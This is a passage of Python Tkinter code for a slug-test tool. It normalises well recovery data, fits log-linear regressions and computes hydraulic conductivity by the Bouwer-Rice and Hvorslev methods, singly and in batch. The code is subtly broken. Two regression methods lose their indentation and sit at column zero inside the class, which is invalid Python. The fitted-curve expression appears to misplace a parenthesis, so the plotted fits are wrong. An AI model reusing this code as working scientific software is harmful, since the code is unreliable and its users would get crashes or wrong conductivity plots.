        DistBaseLevel=[]
        for P in range(0,self.dfRAWDATA.count(axis='rows')[0]):
            DistBaseLevel.append(math.sqrt((self.EstBaseLevel[0]-self.dfRAWDATA.iloc[P,0])**2 + (self.EstBaseLevel[1]-self.dfRAWDATA.iloc[P,3])**2 ))
        MinDistBaseLevel=min(DistBaseLevel)
        IndexMinDistBaseLevel=DistBaseLevel.index(MinDistBaseLevel)
        # Base level is the mean of the ten points before the clicked point.
        self.BaseLevel=np.mean(self.dfRAWDATA.iloc[IndexMinDistBaseLevel-10:IndexMinDistBaseLevel,3])
        if STlabel.get()=='F':# for falling head
            self.StartHead=max(self.dfRAWDATA.iloc[:,3])
            IndexStart=self.dfRAWDATA.iloc[:,3].idxmax()
            k=IndexStart
            while (self.dfRAWDATA.iloc[k,3] >= self.BaseLevel) and (self.dfRAWDATA.iloc[k,3] > self.dfRAWDATA.iloc[-1,3]):
                k=k+1
            if self.dfRAWDATA.iloc[k,3] > self.BaseLevel:
                tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement")
        if STlabel.get()=='R':# for rising head
            self.StartHead=min(self.dfRAWDATA.iloc[:,3])
            IndexStart=self.dfRAWDATA.iloc[:,3].idxmin()
            k=IndexStart
            while (self.dfRAWDATA.iloc[k,3]<= self.BaseLevel) and (self.dfRAWDATA.iloc[k,3] < self.dfRAWDATA.iloc[-1,3]):
                k=k+1
            if self.dfRAWDATA.iloc[k,3] < self.BaseLevel:
                tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement")
        self.H0=self.BaseLevel-self.StartHead
        self.DFSlicedNormHead=pd.DataFrame([self.dfRAWDATA.iloc[IndexStart:k,0], self.dfRAWDATA.iloc[IndexStart:k,3]], index=self.ListNamesCols)
        self.DFSlicedNormHead=self.DFSlicedNormHead.transpose()
        for w in range (0,k-IndexStart):
            self.DFSlicedNormHead.iloc[w,1]=(self.BaseLevel-self.DFSlicedNormHead.iloc[w,1])/(self.H0) # normalized head of the sliced part (minhead to baselevel)
            self.DFSlicedNormHead.iloc[w,0]=self.DFSlicedNormHead.iloc[w,0]-self.dfRAWDATA.iloc[IndexStart,0] # start time for each measurement should be zero in order to plot measurements with different frequencies on one graph
        # slicing the normalized heads list to the desired ranges for the calculations and taking the logs that are used in the linear regression:
        self.DFSlicedNormHead_All=self.DFSlicedNormHead[(self.DFSlicedNormHead[self.ListNamesCols[1]]>=0.035)&(self.DFSlicedNormHead[self.ListNamesCols[1]]<=1)]
        if (V3.get()==True) or (V6.get()==True) or (V9.get()==True) or (V12.get()==True):
            self.DFSlicedLogNormHead_All=self.DFSlicedNormHead_All.copy() # copy() is needed for not overwriting the original dataframe
            self.DFSlicedLogNormHead_All[self.ListNamesCols[1]]=self.DFSlicedNormHead_All[self.ListNamesCols[1]].map(lambda a: math.log(a))
        if (V1.get()==True) or (V4.get()==True):
            self.DFSlicedNormHead_RangeBR=self.DFSlicedNormHead[(self.DFSlicedNormHead[self.ListNamesCols[1]]>=0.2)&(self.DFSlicedNormHead[self.ListNamesCols[1]]<=0.3)]
            self.DFSlicedLogNormHead_RangeBR=self.DFSlicedNormHead_RangeBR.copy()
            self.DFSlicedLogNormHead_RangeBR[self.ListNamesCols[1]]=self.DFSlicedNormHead_RangeBR[self.ListNamesCols[1]].map(lambda a: math.log(a))
        if (V7.get()==True) or (V10.get()==True):
            self.DFSlicedNormHead_RangeH=self.DFSlicedNormHead[(self.DFSlicedNormHead[self.ListNamesCols[1]]>=0.15)&(self.DFSlicedNormHead[self.ListNamesCols[1]]<=0.25)]
            self.DFSlicedLogNormHead_RangeH=self.DFSlicedNormHead_RangeH.copy()
            self.DFSlicedLogNormHead_RangeH[self.ListNamesCols[1]]=self.DFSlicedNormHead_RangeH[self.ListNamesCols[1]].map(lambda a: math.log(a))
        if (V2.get()==True) or (V5.get()==True) or (V8.get()==True) or (V11.get()==True):
            self.DFSlicedNormHead_Begin=self.DFSlicedNormHead[(self.DFSlicedNormHead[self.ListNamesCols[1]]>=0.3)&(self.DFSlicedNormHead[self.ListNamesCols[1]]<=1)]
            self.DFSlicedLogNormHead_Begin=self.DFSlicedNormHead_Begin.copy()
            self.DFSlicedLogNormHead_Begin[self.ListNamesCols[1]]=self.DFSlicedNormHead_Begin[self.ListNamesCols[1]].map(lambda a: math.log(a))
# determines the linear regression coefficients for the corresponding range of selected data (All data/ 0.20-0.30/ 0.15-0.25 /0.3-1)
# used in Performalc()
def LinearRegression(self,DFSlicedLogNormHead_X):
self.LinRegCoef=np.polyfit(DFSlicedLogNormHead_X[self.ListNamesCols[0]], DFSlicedLogNormHead_X[self.ListNamesCols[1]],1)
self.H01=math.exp(self.LinRegCoef[1])*self.H0
self.T01=(-1-self.LinRegCoef[1])/self.LinRegCoef[0]
#LinRegCorr=np.corrcoef(DFSlicedLogNormHead_X[ListNamesCols[0]], DFSlicedLogNormHead_X[ListNamesCols[1]])[0,1] # not used, but can be implemented when information regarding the regression fit is wanted
print(self.DFSlicedNormHead)
print(self.LinRegCoef)
self.dfFit=pd.DataFrame([np.array(range(0,len(self.DFSlicedNormHead.index)+1)), [math.exp(i) for i in self.LinRegCoef[0]*np.array(range(0,len(self.DFSlicedNormHead.index)+1)+self.LinRegCoef[1])]], index=self.ListNamesCols)
self.dfFit=self.dfFit.transpose()
# FOR BATCH CALC - determines the linear regression coefficients for the corresponding range of selected data (All data/ 0.20-0.30/ 0.15-0.25 /0.3-1)
# used in BatchCalc()
def LinearRegression_B(self,DFSlicedLogNormHead_X_B):
self.LinRegCoef_B=np.polyfit(DFSlicedLogNormHead_X_B[self.listNamesRepMeas_TH[self.batchfile]], DFSlicedLogNormHead_X_B[self.listNamesRepMeas_TH[self.batchfile+1]],1)
self.H01=math.exp(self.LinRegCoef_B[1])*self.H0_Blist[int(self.batchfile/2)]
self.T01=(-1-self.LinRegCoef_B[1])/self.LinRegCoef_B[0]
self.DFSlicedNormHead_Rep_1=self.DFSlicedNormHead_Rep_1.dropna(axis=0,inplace=False) # drop the Nan values
self.DFSlicedNormHead_Rep_1=self.DFSlicedNormHead_Rep_1.reset_index(drop=True) # reset the index from 0 to #rows
print(self.LinRegCoef_B)
#LinRegCorr=np.corrcoef(DFSlicedLogNormHead_X[ListNamesCols[0]], DFSlicedLogNormHead_X[ListNamesCols[1]])[0,1] # not used, but can be implemented when information regarding the regression fit is wanted
self.dfFit_B=pd.DataFrame([np.array(range(0,len(self.DFSlicedNormHead_Rep_1.index)+1)), [math.exp(i) for i in self.LinRegCoef_B[0]*np.array(range(0,len(self.DFSlicedNormHead_Rep_1.index)+1)+self.LinRegCoef_B[1])]], index=[self.listNamesRepMeas_TH[self.batchfile],self.listNamesRepMeas_TH[self.batchfile+1]])
self.dfFit_B=self.dfFit_B.transpose()
    # pop-up window with the regression results
    # used in PerformCalc()
    def PlotRegResults(self):
        """Open a semilog plot of the normalized head for the regression.

        Stores the figure in self.PlotRegRes and the axes in self.ax3 so
        PerformCalc can overlay the fitted curves.
        """
        box5 = tk.Toplevel(background='#B4D0E9')
        box5.title("Regression results for "+ self.filename)
        self.PlotRegRes = plt.figure(figsize=(7,7),facecolor='#B4D0E9')
        plt.title("Regression results for "+ self.filename, fontsize=16)
        self.ax3= plt.subplot(111)
        plt.ylabel('Normalized Head [L]', fontsize=14)
        plt.xlabel('Time [T]', fontsize=14)
        self.DFSlicedNormHead_All.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1], ax=self.ax3, logy=True,color='c')
        self.Canvas(self.PlotRegRes, box5,0,0)
    # the regression results directly to a pdf (no pop up window)
    # used in BatchPerform()
    def BatchRegResults(self):
        """Draw the regression plot for batch measurement self.batchfile.

        Same layout as PlotRegResults but without a pop-up; the figure and
        axes are stored in self.PlotRegRes_B and self.ax6.
        """
        self.PlotRegRes_B = plt.figure(figsize=(7,7),facecolor='#B4D0E9')
        plt.title("Regression results for "+ self.listNamesRepMeas_TH[self.batchfile], fontsize=16)
        self.ax6= plt.subplot(111)
        plt.ylabel('Normalized Head [L]', fontsize=14)
        plt.xlabel('Time [T]', fontsize=14)
        self.DFSlicedNormHead_Rep_1.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True,color='c')
    # shows a pop up window with a table with the calculated hydraulic conductivity values
    # used in PerformCalc()
    def TableResults(self):
        """Show self.ResultsK as a matplotlib table in a pop-up window."""
        box6 = tk.Toplevel(background='#B4D0E9')
        box6.title('Horizontal hydraulic conductivity [L/T] of '+ self.filename+'.')
        tk.Label(box6,text='Horizontal hydraulic conductivity [L/T] of ' + self.filename +'.', background='#B4D0E9',font=("Helvetica", "14")).grid(row=0, column=1)
        tk.Label(box6, text=' ', width=10, background='#2A6496').grid(row=0, column=0)
        TableResults= plt.figure(figsize=(16,5),facecolor='#B4D0E9')
        plt.subplot(111)
        cell_text = []
        for row in range(len(self.ResultsK)):
            cell_text.append(self.ResultsK.iloc[row])
        ResultsTable=plt.table(cellText=cell_text, rowLabels=self.ResultsK.index, colLabels=self.ResultsK.columns, colWidths=[0.20,0.20,0.20,0.20], loc='center')
        ResultsTable.set_fontsize(14)
        ResultsTable.scale(1,2)
        # Hide the axes so only the table is visible.
        plt.axis('off')
        self.Canvas(TableResults, box6, 1,1)
    # checks which calculations options are checked and performs the hydraulic conductivity calculations, shows the results in pop-up windows
    def PerformCalc(self):
        """Run the selected conductivity calculations and show the results.

        Reads the well geometry from the GUI entry fields, slices and
        normalizes the data, then for each checked option (module-level
        V1..V12: Bouwer-Rice/Hvorslev x fully/partially penetrating x
        best range/no-full-recovery/all-data) runs the regression and the
        corresponding Kh formula. Results are collected in self.ResultsK
        (Kh) and self.ResultsH0T0 (H0+/T0+), the fitted curves are overlaid
        on the regression plot and a results table is shown.
        """
        try:
            self.LinearReg_Coeff=[]
            self.Aniso=float(ANISO.get())
            self.d=float(D.get())
            self.Le=float(LE.get())
            self.rc=float(RC.get())
            self.rw=float(RW.get())
            LegendList=['Measurements']
            self.DefBaseLevel()
            self.SplitProcDataForCalc()
            # making results dataframe for hydraulic conductivities
            index=['Best range','No full recovery','All data']
            self.ResultsK=pd.DataFrame(np.nan,index=index,columns=['Bouwer-Rice, fully p.','Bouwer-Rice, partially p.','Hvorslev, fully p.','Hvorslev, partially p.'])
            # making results dataframe for H0 and T0
            iterables2=[['Best range','No full recovery','All data'],['H0+','T0+']]
            index2 = pd.MultiIndex.from_product(iterables2)
            self.ResultsH0T0=pd.DataFrame(np.nan,index=index2,columns=['Bouwer-Rice, fully penetrating','Bouwer-Rice, partially penetrating','Hvorslev, fully pnetrating', 'Hvorslev, partially penetrating'])
            self.PlotRegResults()
            if V1.get()== True: # if this button is clicked, the calculations are done for the specific method (Bouwer-Rice/Hvorslev) and range (best range, all data, begin of the data)
                self.LinearRegression(self.DFSlicedLogNormHead_RangeBR)
                self.LinearReg_Coeff.append(self.LinRegCoef[:])
                self.ResultsH0T0.iloc[0,0]=self.H01
                self.ResultsH0T0.iloc[1,0]=self.T01
                self.KhBouwerRice_FP()
                self.ResultsK.iloc[0,0]=self.Kh_BR_FP
                self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='g')
                LegendList.append('Bouwer-Rice - range 0.20-0.30')
            if V4.get()==True:
                self.AqThick=float(AQTHICK.get())
                self.LinearRegression(self.DFSlicedLogNormHead_RangeBR)
                self.ResultsH0T0.iloc[0,1]=self.H01
                self.ResultsH0T0.iloc[1,1]=self.T01
                self.KhBouwerRice_PP()
                self.ResultsK.iloc[0,1]=round(self.Kh_BR_PP, 5)
                # The fit line per range is only drawn once, even when several
                # methods share the same range.
                if V1.get()== False:
                    self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='g')
                    LegendList.append('Bouwer-Rice - range 0.20-0.30')
            if V7.get()==True:
                self.AqThick=float(AQTHICK.get())
                self.re=float(RE.get())
                self.LinearRegression(self.DFSlicedLogNormHead_RangeH)
                self.LinearReg_Coeff.append(self.LinRegCoef[:])
                self.ResultsH0T0.iloc[0,2]=self.H01
                self.ResultsH0T0.iloc[1,2]=self.T01
                self.KhHvorslev_FP()
                self.ResultsK.iloc[0,2]=self.Kh_H_FP
                self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='b')
                LegendList.append('Hvorslev - range 0.15-0.25')
            if V10.get()==True:
                self.LinearRegression(self.DFSlicedLogNormHead_RangeH)
                self.LinearReg_Coeff.append(self.LinRegCoef[:])
                self.ResultsH0T0.iloc[0,3]=self.H01
                self.ResultsH0T0.iloc[1,3]=self.T01
                self.KhHvorslev_PP()
                self.ResultsK.iloc[0,3]=self.Kh_H_PP
                if V7.get()== False:
                    self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='b')
                    LegendList.append('Hvorslev - range 0.15-0.25')
            if V2.get()==True:
                self.LinearRegression(self.DFSlicedLogNormHead_Begin)
                self.LinearReg_Coeff.append(self.LinRegCoef[:])
                self.ResultsH0T0.iloc[2,0]=self.H01
                self.ResultsH0T0.iloc[3,0]=self.T01
                self.KhBouwerRice_FP()
                self.ResultsK.iloc[1,0]=self.Kh_BR_FP
                self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='y')
                LegendList.append('Range 0.3-1')
            if V5.get()==True:
                self.AqThick=float(AQTHICK.get())
                self.LinearRegression(self.DFSlicedLogNormHead_Begin)
                self.ResultsH0T0.iloc[2,1]=self.H01
                self.ResultsH0T0.iloc[3,1]=self.T01
                self.KhBouwerRice_PP()
                self.ResultsK.iloc[1,1]=self.Kh_BR_PP
                if V2.get()== False:
                    self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='y')
                    LegendList.append('Range 0.30-1')
            if V8.get()==True:
                self.AqThick=float(AQTHICK.get())
                self.re=float(RE.get())
                self.LinearRegression(self.DFSlicedLogNormHead_Begin)
                self.ResultsH0T0.iloc[2,2]=self.H01
                self.ResultsH0T0.iloc[3,2]=self.T01
                self.KhHvorslev_FP()
                self.ResultsK.iloc[1,2]=self.Kh_H_FP
                if (V2.get()== False) & (V5.get()== False):
                    self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='y')
                    LegendList.append('Range 0.3-1')
            if V11.get()==True:
                self.LinearRegression(self.DFSlicedLogNormHead_Begin)
                self.ResultsH0T0.iloc[2,3]=self.H01
                self.ResultsH0T0.iloc[3,3]=self.T01
                self.KhHvorslev_PP()
                self.ResultsK.iloc[1,3]=self.Kh_H_PP
                if (V2.get()== False) & (V8.get()== False)& (V5.get()== False):
                    self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='y')
                    LegendList.append('Range 0.3-1')
            if V3.get()==True:
                self.LinearRegression(self.DFSlicedLogNormHead_All)
                self.LinearReg_Coeff.append(self.LinRegCoef[:])
                self.ResultsH0T0.iloc[4,0]=self.H01
                self.ResultsH0T0.iloc[5,0]=self.T01
                self.KhBouwerRice_FP()
                self.ResultsK.iloc[2,0]=self.Kh_BR_FP
                self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='m')
                LegendList.append('All data')
            if V6.get()==True:
                self.AqThick=float(AQTHICK.get())
                self.LinearRegression(self.DFSlicedLogNormHead_All)
                self.ResultsH0T0.iloc[4,1]=self.H01
                self.ResultsH0T0.iloc[5,1]=self.T01
                self.KhBouwerRice_PP()
                self.ResultsK.iloc[2,1]=self.Kh_BR_PP
                if V3.get()== False:
                    self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='m')
                    LegendList.append('All data')
            if V9.get()==True:
                self.AqThick=float(AQTHICK.get())
                self.re=float(RE.get())
                self.LinearRegression(self.DFSlicedLogNormHead_All)
                self.ResultsH0T0.iloc[4,2]=self.H01
                self.ResultsH0T0.iloc[5,2]=self.T01
                self.KhHvorslev_FP()
                self.ResultsK.iloc[2,2]=self.Kh_H_FP
                if (V3.get()== False) & (V6.get()== False):
                    self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='m')
                    LegendList.append('All data')
            if V12.get()==True:
                self.LinearRegression(self.DFSlicedLogNormHead_All)
                self.ResultsH0T0.iloc[4,3]=self.H01
                self.ResultsH0T0.iloc[5,3]=self.T01
                self.KhHvorslev_PP()
                self.ResultsK.iloc[2,3]=self.Kh_H_PP
                if (V3.get()== False) & (V6.get()== False)& (V9.get()== False):
                    self.dfFit.plot(x=self.ListNamesCols[0], y=self.ListNamesCols[1],ax=self.ax3, logy=True, linestyle='dashed', color='m')
                    LegendList.append('All data')
            plt.axis([self.DFSlicedNormHead_All.iloc[0,0],self.DFSlicedNormHead_All.iloc[-1,0],self.DFSlicedNormHead_All.iloc[-1,1],self.DFSlicedNormHead_All.iloc[0,1]])
            plt.legend(LegendList, fontsize=11)
            self.ResultsK=self.ResultsK.fillna(" \ ") # instead of nan, '\' will be displayed in the results table for the non-calculated values
            self.TableResults()
        except ValueError:
            tk.messagebox.showerror("Warning", "The calculations cannot be performed! \nCheck if all needed parameters are given and in the correct (float) format")
# Batch calculation of multiple files, with the same parameters and the same calculation options => calculation formule
# no saving of H0+,T0+
    def BatchCalc(self):
        """Batch-calculate Kh for all repeated measurements with one set of parameters.

        Each measurement is a (time, normalized head) column pair in
        self.DFSlicedNormHead_Rep, named by consecutive entries of
        self.listNamesRepMeas_TH.  The same well/aquifer parameters and the
        same method checkboxes (V1..V12: Bouwer-Rice / Hvorslev, fully /
        partially penetrating, per data range) are applied to every
        measurement.  One regression-plot PDF is saved per measurement and
        all Kh values are written to a single Excel file chosen by the user.
        H0+ and T0+ are not saved in batch mode.
        """
        # results table: one row per (measurement, data range), one column per method
        iterables=[self.listNamesRepMeas_H,['Best range','No full recovery','All data']] # NOTE(review): original Dutch comment here said "this is still too much"
        index = pd.MultiIndex.from_product(iterables)
        self.ResultsKB_all=pd.DataFrame(np.nan,index=index,columns=['Bouwer-Rice, fully p.','Bouwer-Rice, partially p.','Hvorslev, fully p.','Hvorslev, partially p.'])
        try:
            # first the general things: get parameters (a bad float raises
            # ValueError, caught below and reported via a message box)
            self.Aniso=float(ANISO.get())
            self.d=float(D.get())
            self.Le=float(LE.get())
            self.rc=float(RC.get())
            self.rw=float(RW.get())
            # columns come in (time, head) pairs, hence the step of 2;
            # note the loop variable is (unusually) stored on self
            for self.batchfile in range(0, len(self.listNamesRepMeas_TH)-1,2):
                LegendList=['Measurements']
                # slicing the normalized heads list to the desired ranges for the calculations and taking the logs that are used in the linear regression: (part of SplitPlotDataForCalc)
                # first select the two columns corresponding to one measurement
                self.DFSlicedNormHead_Rep_1a=self.DFSlicedNormHead_Rep.loc[:,[self.listNamesRepMeas_TH[self.batchfile],self.listNamesRepMeas_TH[self.batchfile+1]]]
                # drop the tail of the recovery (normalized head < 0.035)
                self.DFSlicedNormHead_Rep_1=self.DFSlicedNormHead_Rep_1a[(self.DFSlicedNormHead_Rep_1a[self.listNamesRepMeas_TH[self.batchfile+1]]>=0.035)]
                # 'All data' range, needed by V3/V6/V9/V12
                if (V3.get()==True) or (V6.get()==True) or (V9.get()==True) or (V12.get()==True):
                    self.DFSlicedLogNormHead_Rep_All=self.DFSlicedNormHead_Rep_1.copy() # copy() is needed for not overwriting the original dataframe
                    self.DFSlicedLogNormHead_Rep_All[self.listNamesRepMeas_TH[self.batchfile+1]]=self.DFSlicedLogNormHead_Rep_All[self.listNamesRepMeas_TH[self.batchfile+1]].map(lambda a: math.log(a))
                # Bouwer-Rice best range 0.20-0.30, needed by V1/V4
                if (V1.get()==True) or (V4.get()==True):
                    self.DFSlicedNormHead_Rep_RangeBR=self.DFSlicedNormHead_Rep_1[(self.DFSlicedNormHead_Rep_1[self.listNamesRepMeas_TH[self.batchfile+1]]>=0.2)&(self.DFSlicedNormHead_Rep_1[self.listNamesRepMeas_TH[self.batchfile+1]]<=0.3)]
                    self.DFSlicedLogNormHead_Rep_RangeBR=self.DFSlicedNormHead_Rep_RangeBR.copy()
                    self.DFSlicedLogNormHead_Rep_RangeBR[self.listNamesRepMeas_TH[self.batchfile+1]]=self.DFSlicedNormHead_Rep_RangeBR[self.listNamesRepMeas_TH[self.batchfile+1]].map(lambda a: math.log(a))
                # Hvorslev best range 0.15-0.25, needed by V7/V10
                if (V7.get()==True) or (V10.get()==True):
                    self.DFSlicedNormHead_Rep_RangeH=self.DFSlicedNormHead_Rep_1[(self.DFSlicedNormHead_Rep_1[self.listNamesRepMeas_TH[self.batchfile+1]]>=0.15)&(self.DFSlicedNormHead_Rep_1[self.listNamesRepMeas_TH[self.batchfile+1]]<=0.25)]
                    self.DFSlicedLogNormHead_Rep_RangeH=self.DFSlicedNormHead_Rep_RangeH.copy()
                    self.DFSlicedLogNormHead_Rep_RangeH[self.listNamesRepMeas_TH[self.batchfile+1]]=self.DFSlicedNormHead_Rep_RangeH[self.listNamesRepMeas_TH[self.batchfile+1]].map(lambda a: math.log(a))
                # 'No full recovery' range 0.3-1, needed by V2/V5/V8/V11
                if (V2.get()==True) or (V5.get()==True) or (V8.get()==True) or (V11.get()==True):
                    self.DFSlicedNormHead_Rep_Begin=self.DFSlicedNormHead_Rep_1[(self.DFSlicedNormHead_Rep_1[self.listNamesRepMeas_TH[self.batchfile+1]]>=0.3)&(self.DFSlicedNormHead_Rep_1[self.listNamesRepMeas_TH[self.batchfile+1]]<=1)]
                    self.DFSlicedLogNormHead_Rep_Begin=self.DFSlicedNormHead_Rep_Begin.copy()
                    self.DFSlicedLogNormHead_Rep_Begin[self.listNamesRepMeas_TH[self.batchfile+1]]=self.DFSlicedNormHead_Rep_Begin[self.listNamesRepMeas_TH[self.batchfile+1]].map(lambda a: math.log(a))
                self.BatchRegResults()
                if V1.get()== True: # if this button is clicked, the calculations are done for the specific method (Bouwer-Rice/Hvorslev) and range (best range, all data, begin of the data)
                    self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_RangeBR)
                    self.KhBouwerRice_FP()
                    # NOTE(review): unlike all other branches, this value is stored unrounded
                    self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'Best range'),'Bouwer-Rice, fully p.']=self.Kh_BR_FP
                    self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='g')
                    LegendList.append('Bouwer-Rice - range 0.20-0.30')
                if V4.get()==True:
                    self.AqThick=float(AQTHICK.get())
                    self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_RangeBR)
                    self.KhBouwerRice_PP()
                    self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'Best range'),'Bouwer-Rice, partially p.']=round(self.Kh_BR_PP, 10)
                    # only plot the fit line once per range/color
                    if V1.get()== False:
                        self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='g')
                        LegendList.append('Bouwer-Rice - range 0.20-0.30')
                if V7.get()==True:
                    self.AqThick=float(AQTHICK.get())
                    self.re=float(RE.get())
                    self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_RangeH)
                    self.KhHvorslev_FP()
                    self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'Best range'),'Hvorslev, fully p.']=round(self.Kh_H_FP,10)
                    self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='b')
                    LegendList.append('Hvorslev - range 0.15-0.25')
                if V10.get()==True:
                    self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_RangeH)
                    self.KhHvorslev_PP()
                    self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'Best range'),'Hvorslev, partially p.']=round(self.Kh_H_PP,10)
                    if V7.get()== False:
                        self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='b')
                        LegendList.append('Hvorslev - range 0.15-0.25')
                if V2.get()==True:
                    self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_Begin)
                    self.KhBouwerRice_FP()
                    self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'No full recovery'),'Bouwer-Rice, fully p.']=round(self.Kh_BR_FP,10)
                    self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='y')
                    LegendList.append('Range 0.3-1')
                if V5.get()==True:
                    self.AqThick=float(AQTHICK.get())
                    self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_Begin)
                    self.KhBouwerRice_PP()
                    self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'No full recovery'),'Bouwer-Rice, partially p.']=round(self.Kh_BR_PP,10)
                    if V2.get()== False:
                        self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='y')
                        # NOTE(review): label is 'Range 0.30-1' here but 'Range 0.3-1' in the sibling branches
                        LegendList.append('Range 0.30-1')
                if V8.get()==True:
                    self.AqThick=float(AQTHICK.get())
                    self.re=float(RE.get())
                    self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_Begin)
                    self.KhHvorslev_FP()
                    self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'No full recovery'),'Hvorslev, fully p.']=round(self.Kh_H_FP,10)
                    if (V2.get()== False) & (V5.get()== False):
                        self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='y')
                        LegendList.append('Range 0.3-1')
                if V11.get()==True:
                    self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_Begin)
                    self.KhHvorslev_PP()
                    self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'No full recovery'),'Hvorslev, partially p.']=round(self.Kh_H_PP,10)
                    if (V2.get()== False) & (V8.get()== False)& (V5.get()== False):
                        self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='y')
                        LegendList.append('Range 0.3-1')
                if V3.get()==True:
                    self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_All)
                    self.KhBouwerRice_FP()
                    self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'All data'),'Bouwer-Rice, fully p.']=round(self.Kh_BR_FP,10)
                    self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='m')
                    LegendList.append('All data')
                if V6.get()==True:
                    self.AqThick=float(AQTHICK.get())
                    self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_All)
                    self.KhBouwerRice_PP()
                    self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'All data'),'Bouwer-Rice, partially p.']=round(self.Kh_BR_PP,10)
                    if V3.get()== False:
                        self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='m')
                        LegendList.append('All data')
                if V9.get()==True:
                    self.AqThick=float(AQTHICK.get())
                    self.re=float(RE.get())
                    self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_All)
                    self.KhHvorslev_FP()
                    self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'All data'),'Hvorslev, fully p.']=round(self.Kh_H_FP,10)
                    if (V3.get()== False) & (V6.get()== False):
                        self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='m')
                        LegendList.append('All data')
                if V12.get()==True:
                    self.LinearRegression_B(self.DFSlicedLogNormHead_Rep_All)
                    self.KhHvorslev_PP()
                    self.ResultsKB_all.loc[(self.listNamesRepMeas_TH[self.batchfile+1],'All data'),'Hvorslev, partially p.']=round(self.Kh_H_PP,10)
                    if (V3.get()== False) & (V6.get()== False)& (V9.get()== False):
                        self.dfFit_B.plot(x=self.listNamesRepMeas_TH[self.batchfile], y=self.listNamesRepMeas_TH[self.batchfile+1],ax=self.ax6, logy=True, linestyle='dashed', color='m')
                        LegendList.append('All data')
                # settings for regression figure (axes follow the data extent)
                self.ax6.axis([self.DFSlicedNormHead_Rep_1.iloc[0,0],self.DFSlicedNormHead_Rep_1.iloc[-1,0],self.DFSlicedNormHead_Rep_1.iloc[-1,1],self.DFSlicedNormHead_Rep_1.iloc[0,1]])
                plt.legend(LegendList, fontsize=11)
                # save figure to pdf (one per measurement)
